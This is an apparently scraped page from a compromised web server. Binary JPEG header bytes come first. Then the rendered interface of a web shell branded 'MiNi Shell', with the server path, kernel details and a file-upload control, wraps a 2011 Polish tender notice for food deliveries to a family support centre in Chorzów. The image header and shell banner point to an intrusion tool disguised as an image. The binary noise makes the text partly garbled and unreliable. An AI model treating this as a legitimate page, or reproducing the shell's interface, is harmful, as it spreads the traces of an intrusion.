JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20110308/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20110308/39072-N-2011.html

<p class="kh_header"><b>Chorzów: Dostawę artykułów spożywczych dla potrzeb Ośrodka Wsparcia Rodziny w Chorzowie, części I - VI</b><br>
<b>Numer ogłoszenia: 39072 - 2011; data zamieszczenia: 08.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Wsparcia Rodziny , ul. Siemianowicka 58, 41-503 Chorzów, woj. śląskie, tel. 32 241 15 27, faks 32 241 15 27.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.owrchorzow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.owrchorzow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: wielofunkcyjna placówka opiekuńczo-wychowawcza.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawę artykułów spożywczych dla potrzeb Ośrodka Wsparcia Rodziny w Chorzowie, części I - VI.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są sukcesywne dostawy artykułów spożywczych do przygotowywania posiłków dla podopiecznych Ośrodek Wsparcia Rodziny w Chorzowie przy ul. Siemianowickiej 58, w okresie do 31 grudnia 2011 roku.
2. Przedmiot zamówienia został podzielony na następujące części:
1) Część I - dostawa mięsa i produktów mięsnych
2) Część II - dostawa pieczywa i wyrobów piekarskich
3) Część III - dostawa mleka, produktów mleczarskich i jaj
4) Część IV - dostawa ryb i przetworów rybnych 
5) Część V - dostawa warzyw i owoców - świeżych i mrożonych
6) Część VI - dostawa różnych artykułów spożywczych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających stanowiących nie więcej niż 20% zamówienia podstawowego, w przypadku konieczności zwiększenia liczby przygotowywanych posiłków.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.11.10.00-9, 15.11.21.00-7, 15.11.30.00-3, 15.13.11.30-5, 15.13.11.34-3, 15.81.00.00-9, 15.81.21.00-4, 15.50.00.00-3, 15.51.00.00-6, 15.51.12.10-8, 15.51.20.00-0, 15.53.00.00-2, 15.54.21.00-0, 15.54.40.00-3, 15.55.13.00-8, 15.43.11.00-9, 03.14.25.00-3, 15.20.00.00-0, 03.21.21.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia / nie spełnia
-na poddstawie złozonego oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia / nie spełnia
-na poddstawie złozonego oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia / nie spełnia
-na poddstawie złozonego oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia / nie spełnia
-na poddstawie złozonego oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia / nie spełnia
-na poddstawie złozonego oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. protokół kontroli sanitarnej środków transportu, którymi będzie dostarczany towar, w celu potwierdzenia, że spełniają one wymagania konieczne do zapewnienia higieny w procesie przewozu
2. potwierdzenie wykonania badań jaj - dotyczy dostawy jaj</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.owrchorzow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Wsparcia Rodziny
ul. Siemianowicka 58
41-503 Chorzów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.03.2011 godzina 10:30, miejsce: Ośrodek Wsparcia Rodziny
ul. Siemianowicka 58
41-503 Chorzów
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> dostawa mięsa i produktów mięsnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mięso:
1. Gulasz wieprzowy świeży	108,00kg
2. Mięso mielone wieprzowo-wołowe świeże	81,00kg
3. Mięso wieprzowe - karczek bez kości - świeże	27,00kg
4. Mięso wieprzowe - szynka bez kości	27,00kg
5. Mięso wołowe EXTRA - pieczeniowe bez kości świeże	27,00kg
6. Pierś z kurczaka - filety świeże	108,00kg
7. Porcje rosołowe drobiowe świeże	270,00kg
8. Schab bez kości świeży	108,00kg
9. Udka z kurczaka świeże	121,50kg
Wędliny:	
10. Parówka cieńka drobiowa	90,00kg
11. Kiełbasa śląska	45,00kg
12. Kiełbasa toruńśka	45,00kg
13. Krupniok świeży	22,50kg
14. Metka	54,00kg
15. Mortadela	81,00kg
16. Polędwica sopocka	54,00kg
17. Szynka gotowana 	54,00kg
18. Wątróbka świeża	22,50kg
19. Wędlina - mielonka	135,00kg
20. Wędlina - szynkowa	121,50kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.11.10.00-9, 15.11.21.00-7, 15.11.30.00-3, 15.13.11.30-5, 15.13.11.34-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> dostawa pieczywa i wyrobów piekarskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Bułka zwykła	11 340,00	szt.
2. Bułka maślana	2 160,00	szt.
3. Bułka z ziarnami	1 080,00	szt.
4. Bułka serowa	540,00	szt.
5. Bułka grahamnka	180,00	szt.
6. Chleb zwykły przenny - duży	384,00	szt.
7. Chleb z ziarnem	72,00	szt.
8. Chleb graham	72,00	szt.
9. Chleb orkisz	72,00	szt.
10. Drożdzówka z nadzieniem ser/marmolada/mak	540,00	szt.
11. Pączek z marmoladą	540,00	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9, 15.81.21.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> dostawa mleka, produktów mleczarskich i jaj.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Jogurt owocowy	1 080,00	szt.
2. Margaryna mleczna	135,00	szt.
3. Masło roślinne w kubku	180,00	szt.
4. Masło zwykłe 82% tłuszczu	1 215,00	szt.
5. Mleko spożywcze 3,2% w kartonie	4050,00	litr
6. Ser biały półtłusty	45,00	kg
7. Serek homogenizowany	1 080,00	szt.
8. Ser topiony kremowy	540,00	szt.
9. Serek topiony w kubkach	108,00	szt.
10. Ser twardy gouda	81,00	kg
11. Śmietana 12% UHT w kartonie	90,00	szt.
12. Śmietana gęsta homogenizowana	36,00	litr
13. Jaja chłodnicze L	2 250,00	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.51.00.00-6, 15.51.12.10-8, 15.51.20.00-0, 15.53.00.00-2, 15.54.21.00-0, 15.54.40.00-3, 15.55.13.00-8, 15.43.11.00-9, 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> dostawa ryb i przetworów rybnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Filety rybne z mintaja mrożone	40,50	kg
2. Konserwa rybna w oleju/makrela	135,00	szt
3. Konserwa rybna w sosie pomidorowym/makrela	135,00	szt
4. Paprykarz szczeciński	135,00	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> dostawa warzyw i owoców - świeżych i mrożonych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Buraki czerwone	180,00	kg
2. Cebula	180,00	kg
3. Cebulka zielona /pęczek	540,00	szt.
4. Cytryny	135,00	kg
5. Fasola	54,00	kg
6. Groch łuskany połówki	27,00	kg
7. Jabłka	1 080,00	kg
8. Kapusta biała	63,00	kg
9. Kapusta czerwona	72,00	kg
10. Kapusta kiszona	180,00	kg
11. Kapusta pekińska	135,00	kg
12. Koperek /pęczek	540,00	szt.
13. Marchew	180,00	kg
14. Ogórek kiszony	162,00	kg
15. Ogórek zielony	27,00	kg
16. Papryka czerwona	40,50	kg
17. Pieczarki	36,00	kg
18. Pietruszka zielona /pęczek	540,00	szt.
19. Pomidor	198,00	kg
20. Rzodkiewka /pęczek	360,00	szt.
21. Sałata zielona	360,00	szt.
22. Ziemniaki	4 500,00	kg
23. Barszcz ukraiński	60,00	kg
24. Fasolka	90,00	kg
25. Kalafior	90,00	kg
26. Szpinak	90,00	kg
27. Włoszczyzna	540,00	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-1, 03.22.00.00-9, 15.33.10.00-7, 15.89.60.00-5, 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> dostawa różnych artykułów spożywczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Cukier kryształ	540,00 kg
2. Czosnek w proszku	9,00 kg
3. Papryka w proszku	9,00 kg
4. Pieprz	9,00 kg
5. Przyprawa typu MAGI	108,00 l
6. Przyprawa typu VEGETA	27,00 kg
7. Przyprawy do mięs	9,00 kg
8. Przyprawy do ryb	4,50 kg
9. Przyprawa do gulaszu	9,00 kg
10. Sól jodowana	72,00 kg
11. Herbata czarna - w opakowaniu 50 torebek	180,00 op.
12. Herbata owocowa - w opakowaniu 50 torebek	90,00 op.
13. Kakao ciemne	72,00 op.
14. Kawa zbożowa Inka	198,00 szt.
15. Kasza jęczmienna, średnio-gruba	90,00 kg
16. Kasza manna	90,00 kg
17. Ryż biały	180,00 kg
18. Makaron muszla	36,00 kg
19. Makaron nitki	45,00 kg
20. Makaron spaghetti	27,00 kg
21. Makaron świdry	45,00 kg
22. Makaron łazanka	27,00 kg
23. Mąka pszenna	90,00 kg
24. Mąka ziemniaczana	72,00 kg
25. Płatki owsiane	45,00 kg
26. Płatki śniadaniowe kukurydziane, smakowe	108,00 kg
27. Napój z witaminą C (granulat)	135,00 kg
28. Sok zagęszczony	270,00 l
29. Dżem owocowy	180,00 szt.
30. Krem czekoladowy	135,00 szt.
31. Groszek konserwowy	135,00 szt.
32. Koncentrat pomidorowy 30%	45,00 op.
33. Kukurydza konserwowa	108,00 szt.
34. Olej jadalny rzepakowy	135,00 l
35. Pasztet drobiowy w puszce	675,00 szt.
36. Smalec	90,00 szt.
37. Żur w butelce	72,00 l
38. Ketchup	45,00 l
39. Majonez w słoiku	90,00 l
40. Musztarda	45,00 l
41. Budyń - na 0,5 l z cukrem	270,00 szt.
42. Galaretka - na 0,5 l	270,00 szt.
43. Kisiel - na 0,5 l z cukrem	270,00 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.00.00-0, 15.40.00.00-2, 15.60.00.00-4, 15.83.00.00-5, 15.85.10.00-8, 15.80.00.00-6, 15.32.10.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com